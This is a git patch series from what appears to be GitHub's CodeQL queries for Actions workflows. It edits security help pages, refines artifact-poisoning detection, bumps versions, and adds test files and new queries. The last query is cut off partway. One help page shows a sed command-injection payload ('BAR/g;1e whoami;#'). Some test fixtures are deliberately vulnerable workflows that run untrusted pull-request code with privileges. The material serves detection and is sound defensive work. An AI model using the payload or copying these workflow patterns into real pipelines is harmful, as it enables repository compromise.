`dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs a script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files, an attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. ```yaml name: Insecure Workflow @@ -40,7 +40,7 @@ jobs: ### Correct Usage -The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`. +The following example, correctly creates a temporary directory and extracts the contents of the artifact there before calling `cmd.sh`. ```yaml name: Insecure Workflow diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md index 2d7afb6b66e..9b1782d6ba8 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md +++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md @@ -2,7 +2,7 @@ ## Description -The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. +The workflow downloads artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. ## Recommendations @@ -14,7 +14,7 @@ The workflow download artifacts that may be poisoned by an attacker in previousl ### Incorrect Usage -The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs a script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files, an attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. ```yaml name: Insecure Workflow @@ -40,7 +40,7 @@ jobs: ### Correct Usage -The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`. +The following example, correctly creates a temporary directory and extracts the contents of the artifact there before calling `cmd.sh`. ```yaml name: Insecure Workflow diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md index c391e1255ed..71ba2032a9d 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md @@ -1,4 +1,4 @@ -# Execution of Untrusted Checkedout Code +# Execution of Untrusted Checked-out Code ## Description @@ -10,9 +10,9 @@ GitHub workflows can be triggered through various repository events, including i - Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. - Use labels like `safe to test` to vet PRs and manage the execution context appropriately. -The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). -The artifacts downloaded from the first workflow should be considered untrusted and verified. +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. ## Examples diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md index c391e1255ed..71ba2032a9d 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md @@ -1,4 +1,4 @@ -# Execution of Untrusted Checkedout Code +# Execution of Untrusted Checked-out Code ## Description @@ -10,9 +10,9 @@ GitHub workflows can be triggered through various repository events, including i - Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. - Use labels like `safe to test` to vet PRs and manage the execution context appropriately. -The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). -The artifacts downloaded from the first workflow should be considered untrusted and verified. +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. ## Examples diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md index c391e1255ed..71ba2032a9d 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md @@ -1,4 +1,4 @@ -# Execution of Untrusted Checkedout Code +# Execution of Untrusted Checked-out Code ## Description @@ -10,9 +10,9 @@ GitHub workflows can be triggered through various repository events, including i - Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. - Use labels like `safe to test` to vet PRs and manage the execution context appropriately. -The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). -The artifacts downloaded from the first workflow should be considered untrusted and verified. +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. ## Examples From d6027267aaeda10673ad3f7433b9e1085dbb0dce Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Mon, 12 Aug 2024 09:31:58 +0000 Subject: [PATCH 0478/1267] fix variable name --- ql/src/Security/CWE-077/EnvPathInjectionCritical.md | 2 +- ql/src/Security/CWE-077/EnvPathInjectionMedium.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index 436cf685996..36622d127d8 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -20,7 +20,7 @@ Do not allow untrusted data to influence the system PATH: Avoid using untrusted ### Incorrect Usage -Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: +Consider the following basic setup where an environment variable `PATH` is set: ```yaml steps: diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index 436cf685996..36622d127d8 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md @@ -20,7 +20,7 @@ Do not allow untrusted data to influence the system PATH: Avoid using untrusted ### Incorrect Usage -Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: +Consider the following basic setup where an environment variable `PATH` is set: ```yaml steps: From 0baf7e3cef12575952606e6716e72ab0b36556b1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Aug 2024 13:08:38 +0200 Subject: [PATCH 0479/1267] Update qlpack.yml --- ql/src/qlpack.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 9b4795a0d8a..b0d446479d8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.36 +version: 0.1.37 groups: [actions, queries] suites: codeql-suites extractor: javascript From 1ca985b4152e9bad720464f066e35a0a69c89a68 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Aug 2024 13:09:06 +0200 Subject: [PATCH 0480/1267] Update qlpack.yml --- ql/lib/qlpack.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d9889fb0869..887228ecf88 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.36 +version: 0.1.37 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 From 293dd1a32b4a757069ace51820ce3e0472db2257 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 23 Aug 2024 17:40:25 +0200 Subject: [PATCH 0481/1267] Update ArgumentInjectionCritical.md --- ql/src/Security/CWE-088/ArgumentInjectionCritical.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md index 4957297be92..92e480e4a7a 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md @@ -31,7 +31,7 @@ jobs: cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt ``` -An attacker may set the body of an Issue comment to `BAR|g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. +An attacker may set the body of an Issue comment to `BAR/g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. ## References From 4f57aade35d120635eca67e5f1b706fd9d04b3fb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 10:49:27 +0200 Subject: [PATCH 0482/1267] Improve accuracy of actions/download-artifact as a source If upload is on the same workflow, it needs to be triggered by a priv workflow --- .../security/ArtifactPoisoningQuery.qll | 6 +- .../.github/workflows/direct_cache6.yml | 2 +- .../.github/workflows/untrusted_checkout4.yml | 100 ++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 3 - .../CWE-829/ArtifactPoisoningMedium.expected | 4 - .../UntrustedCheckoutCritical.expected | 10 ++ 6 files changed, 115 insertions(+), 10 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 08a49ab1abb..6881caccd52 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -26,8 +26,10 @@ class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, Us exists(this.getArgument("github-token")) or // There is an artifact upload step in the same workflow which can be influenced by an attacker on a checkout step - exists(UsesStep checkout, UsesStep upload | - this.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and + exists(LocalJob job, UsesStep checkout, UsesStep upload | + this.getEnclosingWorkflow().getAJob() = job and + job.getAStep() = checkout and + job.getATriggerEvent().getName() = "pull_request_target" and checkout.getCallee() = "actions/checkout" and checkout.getAFollowingStep() = upload and upload.getCallee() = "actions/upload-artifact" diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml index 3f35068eb7d..5948474d21a 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml @@ -23,7 +23,7 @@ jobs: key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} restore-keys: ${{ runner.os }}-pip- - name: Download artifact - uses: actions/download-artifact@v4 + uses: dawidd6/action-download-artifact@v2 with: name: results path: results/ diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml new file mode 100644 index 00000000000..5494d97797e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml @@ -0,0 +1,100 @@ +name: Auto Bump Versions + +on: + issue_comment: + types: [created, edited] + +jobs: + add-same-version-label-to-pr: + runs-on: ubuntu-latest + if: github.event.issue.pull_request && contains(github.event.comment.body, '/add-same-version-label') + steps: + - uses: actions/checkout@v3 + - name: Add same version label + uses: actions/github-script@v6 + if: success() + with: + github-token: ${{secrets.GITHUB_TOKEN}} + script: | + github.rest.issues.addLabels({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + labels: ['same version'] + }) + github.rest.issues.createComment({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: '👋 Added [same version] label :)!' + }) + + build: + if: ${{ github.event.issue.pull_request }} && contains(github.event.comment.body, '/version') + runs-on: ubuntu-latest + + steps: + - name: Get PR details + uses: actions/github-script@v6 + id: get-pr + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: context.issue.number + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + try { + const result = await github.rest.pulls.get(request) + return result.data + } catch (err) { + core.setFailed(`Request failed with error ${err}`) + } + + - name: Checkout PR + uses: actions/checkout@v3 + with: + repository: ${{ fromJSON(steps.get-pr.outputs.result).head.repo.full_name }} + ref: ${{ fromJSON(steps.get-pr.outputs.result).head.ref }} + + - name: Update version minor + if: contains(github.event.comment.body, '/version minor') + run: | + ./version.sh -u -n + echo "BUMP_TYPE=minor" >> $GITHUB_ENV + + - name: Update version major + if: contains(github.event.comment.body, '/version major') + run: | + ./version.sh -u -m + echo "BUMP_TYPE=major" >> $GITHUB_ENV + + - name: Update version patch + if: contains(github.event.comment.body, '/version patch') + run: | + ./version.sh -u -p + echo "BUMP_TYPE=patch" >> $GITHUB_ENV + + - name: Add labels + uses: actions/github-script@v6 + if: ${{ env.BUMP_TYPE }} + with: + script: | + github.rest.issues.addLabels({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + labels: ['version/${{ env.BUMP_TYPE }}'] + }) + + - name: Push Changes + if: ${{ env.BUMP_TYPE }} + run: | + git config user.name 'github-actions[bot]' + git config user.email 'github-actions[bot]@users.noreply.github.com' + git pull + git add . + git commit -m "Update ${{ env.BUMP_TYPE }} version" --signoff + git push + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 56ec92c54b6..11c6b98dc87 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -14,7 +14,6 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -46,8 +45,6 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index da10247f1e0..431386fae06 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -14,7 +14,6 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -46,8 +45,5 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select -| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | python test.py | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index d5ad134c976..8707849328b 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -147,6 +147,13 @@ edges | .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout4.yml:12:7:13:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:13:7:32:2 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:37:7:55:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:79:7:91:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:91:7:100:9 | Run Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | @@ -171,5 +178,8 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | From ac7b7b716260a63258870826588c10a90c5b76e4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 10:50:58 +0200 Subject: [PATCH 0483/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 887228ecf88..3fb25b389f8 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.37 +version: 0.1.38 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b0d446479d8..c806f76f42b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.37 +version: 0.1.38 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4820626f291354570ea113c9c32155ae8ec68757 Mon Sep 17 00:00:00 2001 From: Rasmus Wriedt Larsen Date: Fri, 6 Sep 2024 14:04:46 +0200 Subject: [PATCH 0484/1267] Add SyntaxError query This can be used by autofix, but might also be nice to help find YAML syntax errors :shrug: --- ql/src/Debug/SyntaxError.ql | 17 +++++++++++++++++ .../SyntaxError/SyntaxError.expected | 1 + .../query-tests/SyntaxError/SyntaxError.qlref | 1 + ql/test/query-tests/SyntaxError/options | 1 + 4 files changed, 20 insertions(+) create mode 100644 ql/src/Debug/SyntaxError.ql create mode 100644 ql/test/query-tests/SyntaxError/SyntaxError.expected create mode 100644 ql/test/query-tests/SyntaxError/SyntaxError.qlref create mode 100644 ql/test/query-tests/SyntaxError/options diff --git a/ql/src/Debug/SyntaxError.ql b/ql/src/Debug/SyntaxError.ql new file mode 100644 index 00000000000..9a638ad7fbe --- /dev/null +++ b/ql/src/Debug/SyntaxError.ql @@ -0,0 +1,17 @@ +/** + * @name Syntax error + * @description A piece of code could not be parsed due to syntax errors. + * @kind problem + * @problem.severity recommendation + * @id actions/syntax-error + * @tags reliability + * correctness + * language-features + * debug + * @precision very-high + */ + +private import codeql.actions.ast.internal.Yaml + +from YamlParseError pe +select pe, pe.getMessage() diff --git a/ql/test/query-tests/SyntaxError/SyntaxError.expected b/ql/test/query-tests/SyntaxError/SyntaxError.expected new file mode 100644 index 00000000000..386e6554e2d --- /dev/null +++ b/ql/test/query-tests/SyntaxError/SyntaxError.expected @@ -0,0 +1 @@ +| .github/workflows/malformed.yml:7:4:7:4 | expected , but found '' | expected , but found '' | diff --git a/ql/test/query-tests/SyntaxError/SyntaxError.qlref b/ql/test/query-tests/SyntaxError/SyntaxError.qlref new file mode 100644 index 00000000000..97c5686103c --- /dev/null +++ b/ql/test/query-tests/SyntaxError/SyntaxError.qlref @@ -0,0 +1 @@ +Debug/SyntaxError.ql diff --git a/ql/test/query-tests/SyntaxError/options b/ql/test/query-tests/SyntaxError/options new file mode 100644 index 00000000000..096355709a6 --- /dev/null +++ b/ql/test/query-tests/SyntaxError/options @@ -0,0 +1 @@ +semmle-extractor-options: --tolerate-parse-errors --experimental From 2f68e6f26e352ce0373300b386828a5cd05c7633 Mon Sep 17 00:00:00 2001 From: Rasmus Wriedt Larsen Date: Fri, 6 Sep 2024 14:53:46 +0200 Subject: [PATCH 0485/1267] Add missing test file --- .../SyntaxError/.github/workflows/malformed.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml diff --git a/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml b/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml new file mode 100644 index 00000000000..a8bfa4ae19a --- /dev/null +++ b/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml @@ -0,0 +1,7 @@ +on: pull_request_target + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.pull_request.body}} From fefeae44690ce1cbe9b3caba8fbbf4a00878a47e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:00:15 +0200 Subject: [PATCH 0486/1267] feat: New query to report GITHUB_TOKEN exposed in artifacts --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 40 +++++++++++++++++++ .../workflows/secrets-in-artifacts.yml | 23 +++++++++++ .../CWE-312/SecretsInArtifacts.expected | 1 + .../Security/CWE-312/SecretsInArtifacts.qlref | 2 + 4 files changed, 66 insertions(+) create mode 100644 ql/src/Security/CWE-312/SecretsInArtifacts.ql create mode 100644 ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml create mode 100644 ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected create mode 100644 ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql new file mode 100644 index 00000000000..07e498706d8 --- /dev/null +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -0,0 +1,40 @@ +/** + * @name Secret In Artifacts + * @description Secrets are exposed in GitHub Artifacts + * @kind problem + * @problem.severity error + * @security-severity 9.0 + * @precision high + * @id actions/secrets-in-artifacts + * @tags actions + * security + * experimental + * external/cwe/cwe-312 + */ + +import actions + +from 